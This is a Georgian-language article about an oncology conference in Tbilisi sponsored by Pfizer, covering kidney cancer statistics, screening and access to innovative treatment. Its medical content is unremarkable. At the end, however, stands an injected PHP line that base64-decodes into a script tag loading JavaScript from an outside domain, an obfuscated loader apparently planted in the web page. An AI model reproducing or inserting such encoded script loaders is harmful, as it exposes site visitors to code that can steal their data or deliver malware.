celsiusi
ავერსი საქკაბელი

საერთაშორისო გამოცდილების გაცვლა, როგორც ონკოლოგიური დახმარების გაუმჯობესების საფუძველი საქართველოში.

ონკოლოგიური დაავადებების სიკვდილიანობის მაჩვენებლის შემცირების მიუხედავად მაღალშემოსავლიან ქვეყნებში, ონკოლოგიური დაავადებები კაცობრიობისთვის კვლავაც გლობალურ გამოწვევას წარმოადგენს, რომელიც გავლენას ახდენს ადამიანების სიცოცხლის ხარისხზე და დასაქმებაზე. კიბომ, რომელიც სიკვდილიანობის წამყვან მიზეზს წარმოადგენს მთელ მსოფლიოში, 2020 წელს 10 მილიონი ადამიანის სიკვდილი გამოიწვია. . 2020 წელს საქართველოში სიმსივნური დაავადებებისგან 8000-ზე მეტი ადამიანი გარდაიცვალა . ქართველმა და უცხოელმა ექსპერტებმა საერთაშორისო ბიო-ფარმაცევტული კომპანია Pfizer-ის მხარდაჭერით ჩაატარეს ორდღიანი კონფერენცია, მიძღვნილი სიმსივნური დაავადებების ტვირთისა და იმ ნაბიჯებისადმი, რომლებიც აუცილებელია სიმსივნის დიაგნოსტიკის გასაუმჯობესებლად და მკურნალობის ინოვაციური მეთოდების დასანერგად მილიონობით ადამიანის სიცოცხლის გადარჩენის მიზნით. ღონისძიება 23-24 მარტს ჩატარდა.
 
 
23 მარტს ჯანდაცვის სფეროს პროფესიონალებისთვის ჩატარდა კონფერენცია „თირკმლის კიბოს მკურნალობის ალტერნატივები და ონკოლოგიური სამსახურები ცენტრალურ აზიასა და კავკასიაში“. ღონისძიებაზე ავტორიტეტული ექსპერტების ხელმძღვანელობით აქტიური დისკუსია წარიმართა. თირკმლის გავრცელებული ნათელუჯრედოვანი კიბოს განხილვისას ხუთმა ექსპერტმა 38 მონაწილესთან ერთად იმსჯელა საკუთარ მიზნებსა და მიდგომებზე, მათ ერთმანეთს გაუზიარეს უახლესი კლინიკური ინფორმაცია და საკუთარი გამოცდილება თირკმლის კიბოთი დაავადებული პაციენტების მკურნალობის შესახებ.
 
 
მეორე დღეს თბილისის ამერიკულ ჰოსპიტალში ჩატარდა პრეს-კონფერენცია „არც ერთი პაციენტი მკურნალობის გარეშე. თანამედროვე მკურნალობა ონკოლოგიური პაციენტებისთვის საქართველოში“.  ღონისძიების დასაწყისში ჯანდაცვის წამყვანმა ექსპერტებმა ისაუბრეს ონკოლოგიის დარგის მდგომარეობის შესახებ საქართველოში. 2020 წელს ქვეყანაში გამოვლენილი იქნა კიბოს 13,000-ზე მეტი ახალი შემთხვევა, რომელთაგან ყველაზე გავრცელებული ტიპები იყო: ძუძუს კიბო (ყველა შემთხვევის 14,7%), ფილტვის კიბო (10,9%) და კოლორექტალური კიბო (8,8%)1. ექსპერტებმა ასევე გააშუქეს თირკმლის კიბოს უსწრაფესი გავრცელების პრობლემა; თირკმლის კიბო ითვლება მთავარ უროლოგიურ პრობლემად მსოფლიოში და ყოვეწლიურად ხდება მისი 400 000-ზე მეტი ახალი შემთხვევის დიაგნოსტირება .
 
 
ღონისძიების მასპინძელმა, დავით ნიკოლეიშვილმა, PhD, თბილისის ამერიკული ჰოსპიტლის კლინიკური მიმართულების მთავარმა ექიმმა და უროლოგიის დეპარტამენტის ხელმძღვანელმა დამსწრეებს უახლესი ინფორმაცია მიაწოდა საქართველოში არსებული მდგომარეობის შესახებ: „თირკმლის კიბოს განვითარების სიხშირე საქართველოში 2020 წელს 100,000 მოსახლეზე იყო 2.3, სიკვდილიანობის მაჩვენებელი - ასევე 2.3. ეს მაჩვენებლები უფრო დაბალია, ვიდრე ევროკავშირის ქვეყნებში, აშშ-ში ან ავსტრალიაში, რაც შესაძლოა, ამ დაავადების არასაკმარის გამოვლინებაზე მიუთითებს და შემდგომ მუშაობას მოითხოვს. ამავე დროს, ქართული მედიცინა ინტენსიურად ვითარდება, და ჩვენ გვაქვს გარკვეული წარმატებები. მაგალითად, პირველად კავკასიის, ცენტრალური აზიის და ზოგადად პოსტ-საბჭოთა ქვეყნებში, თბილისის ამერიკულ ჰოსპიტალში ჩატარდა მთელი რიგი ინოვაციური ოპერაციები, მათ შორის ექსტრაპერიტონეალური ენდოსკოპური რადიკალური პროსტატექტომია“.
 
 
ონკოლოგებმა განიხილეს ძირითადი ეტაპები კიბოს ტვირთის შესამცირებლად, მათ შორის დაავადების ადრეული დიაგნოსტიკა და მკურნალობის დროული დანიშვნა, საზოგადოების ინფორმირება კიბოს, მისი რისკის ფაქტორების და სიმპტომების, ასევე თანამედროვე დიაგნოსტიკის და მკურნალობის თანაბარი ხელმისაწვდომობის საკითხებზე. გარდა ამისა, ჯანდაცვის სფეროს წარმომადგენლებმა ყურადღება გაამახვილეს ჯანსაღი ცხოვრების წესის პრინციპების დაცვის მნიშვნელობაზე, ვინაიდან ცუდი ჩვევების უმრავლესობა ზრდის დაავადების განვითარების შანსს. მაგალითად, თირკმლის კიბოს განვითარების მთავარი რისკის ფაქტორები, კერძოდ, თამბაქოს მოხმარება, ალკოჰოლის მოხმარება, ჭარბი წონა და ჰიპერტონია, მოდიფიკაციას ექვემდებარება. ექსპერტები აღნიშნავენ, რომ მნიშვნელოვანია ასევე პროფესიული სამედიცინო საზოგადოების ხარისხის სტანდარტების უწყვეტი გაუმჯობესება.
 
 
„სამწუხაროდ, თირკმლის კიბოს შემთხვევაში გადარჩენის მაჩვენებელი როგორც ყაზახეთში, ისე საქართველოში ძალიან დაბალია. არსებობს პრობლემები კიბოს ადრეულ გამოვლინებასთან დაკავშირებით, ნაწილობრივ იმ მიზეზით, რომ ადამიანებს არა აქვთ ყოველწლიურად კიბოს კომპლექსური გამოკვლევის გავლის მოტივაცია. ამ კონფერენციის საშუალებით გვსურს ავამაღლოთ მოსახლეობის ცნობიერება რეგულარული ონკოლოგიური სკრინინგის მნიშვნელობის შესახებ და განვაცხადოთ, რომ კიბო არ არის სასიკვდილო განაჩენი, განსაკუთრებით თუ ის ადრეულ სტადიაზე გამოვლინდება. გარდა ამისა, ჩვენ შეგვიძლია მკურნალობის ყოველგვარი საჭირო ალტერნატივის შემოთავაზება, ასე რომ დღესდღეობით კიბო შეიძლება იმ დაავადებების მსგავს ქრონიკულ დაავადებად განვიხილოთ, როგორიცაა დიაბეტი ან გულის დაავადება. ვიმედოვნებ, თანამშრომლობის ეს და სხვა ღონისძიებები დაგვეხმარება დავძლიოთ მიმდინარე პრობლემა, ავამაღლოთ სამედიცინო მომსახურების ხარისხი და საკუთარი წვლილი შევიტანოთ ჩვენი პაციენტების მკურნალობის ხელმისაწვდომობის გაუმჯობესებაში“, – აღნიშნა მედიცინის დოქტორმა, პროფესორმა დილარა კაიდაროვამ, ამერიკის კლინიკური ონკოლოგიის ასოციაციის (ASCO) ელჩმა ცენტრალური აზიასა და კავკასიაში, ყაზახეთის ონკოლოგიისა და რადიოლოგიის კვლევით ინსტიტუტის (KazIOR JSC) საბჭოს თავმჯდომარემ და ყაზახეთის კიბოს ასოციაციის პრეზიდენტმა.
 
 
კიბოს ტვირთის წინააღმდეგ წარმატებული ბრძოლის უაღრესად მნიშვნელოვან კომპონენტს პაციენტებისთვის ინოვაციურ მედიკამენტებზე წვდომის უზრუნველყოფა წარმოადგენს. ექსპერტებმა ხაზგასმით აღნიშნეს, რომ კიბო არ არის განსაკუთრებული დაავადება, ამიტომ მიდგომა კვლევისა და მკურნალობის შემუშავებისადმი უნდა იყოს ისეთივე ადაპტაციური და მოქნილი, როგორც თავად დაავადება. 
 
 
ზარინა კოჟახმეტოვამ, კომპანიის Pfizer კავკასიისა და ცენტრალური აზიის რეგიონების სამედიცინო დირექტორმა წარმოადგინა კომპანიის საქმიანობა, რომლის მიზანი კიბოს რევოლუციური მკურნალობის შემუშავებაა: „ამ მედია-ღონისძიებით, ისევე, როგორც გუშინდელი კონფერენციით, კომპანიას Pfizer საკუთარი წვლილი შეაქვს ონკოლოგიური გამოცდილების საერთაშორისო გაცვლაში, რომლის მიზანია საფუძველი ჩაუყაროს ექსპერტებს შორის დიალოგს და გააუმჯობესოს ექიმთა განათლების ხარისხი. გვჯერა, რომ ამგვარმა ძალისხმევამ სტიმული უნდა მისცეს ონკოლოგიური დახმარების გაუმჯობესებას მთელ მსოფლიოში და უზრუნველყოს ინოვაციურ მკურნალობაზე ყველა პაციენტის გაუმჯობესებული წვდომა საქართველოში. <…> რევოლუციური მედიკამენტები გვაძლევს კიბოს მქონე ადამიანების სიცოცხლის გაუმჯობესების და გახანგრძლივების საშუალებას. მაგრამ მხოლოდ მედიკამენტები საკმარისი არ არის. მედიკამენტები ეფექტურია მხოლოდ ექიმების მაღალ პროფესიონალიზმთან, მათ გამოცდილებასთან, პერსონალურ ჩართულობასა და პაციენტების მიმართ მზრუნველ დამოკიდებულებასთან კომბინაციაში“.  
 
 
მედიცინის დოქტორმა ნათია ჯოხაძემ, თბილისის ამერიკული ჰოსპიტლის კლინიკური ონკოლოგიის დეპარტამენტის ხელმძღვანელმა აღნიშნა, რომ მედიკამენტებთან ერთად კიბოსთან წარმატებული ბრძოლის უმნიშვნელოვანესი კომპონენტი სამედიცინო მომსახურების მაღალი ხარისხია. ეს გულისხმობს თანამედროვე ქირურგიული და სკრინინგისათვის საჭირო აღჭურვილობის ხელმისაწვდომობას, ისევე, როგორც ონკოლოგების მაღალ პროფესიონალიზმს, რომლებიც უწყვეტად აუმჯობესებენ საკუთარ კვალიფიკაციას და მონაწილეობენ საერთაშორისო საგანმანათლებლო და პრაქტიკულ პროგრამებში.
 
 
ზემოაღნიშნულის შეჯამებისას, ექსპერტებმა ხაზი გაუსვეს, რომ ონკოლოგიური მომსახურების გასაუმჯობესებლად საკმარისი არ არის მხოლოდ კიბოს საწინააღმდეგო მკურნალობა, და რომ ჰოლისტური მიდგომა, რომელშიც კომბინირებულია ისეთი ფაქტორები, როგორიცაა სკრინინგის მოწინავე საშუალებები და კარგად აღჭურვილი სამედიცინო დაწესებულებები, გაუმჯობესებული წვდომა ინოვაციურ მიზნობრივ და იმუნო-ონკოლოგიურ მკურნალობაზე, ექიმთა კვალიფიკაციის უწყვეტი გაუმჯობესება, ფართო საზოგადოების და სამედიცინო წრეების მაღალი ინფორმირებულობა, დაგვეხმარება ეფექტური წინააღმდეგობა გავუწიოთ 21-ე საუკუნის ერთ-ერთ უმძიმეს დაავადებას. 
 
342
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");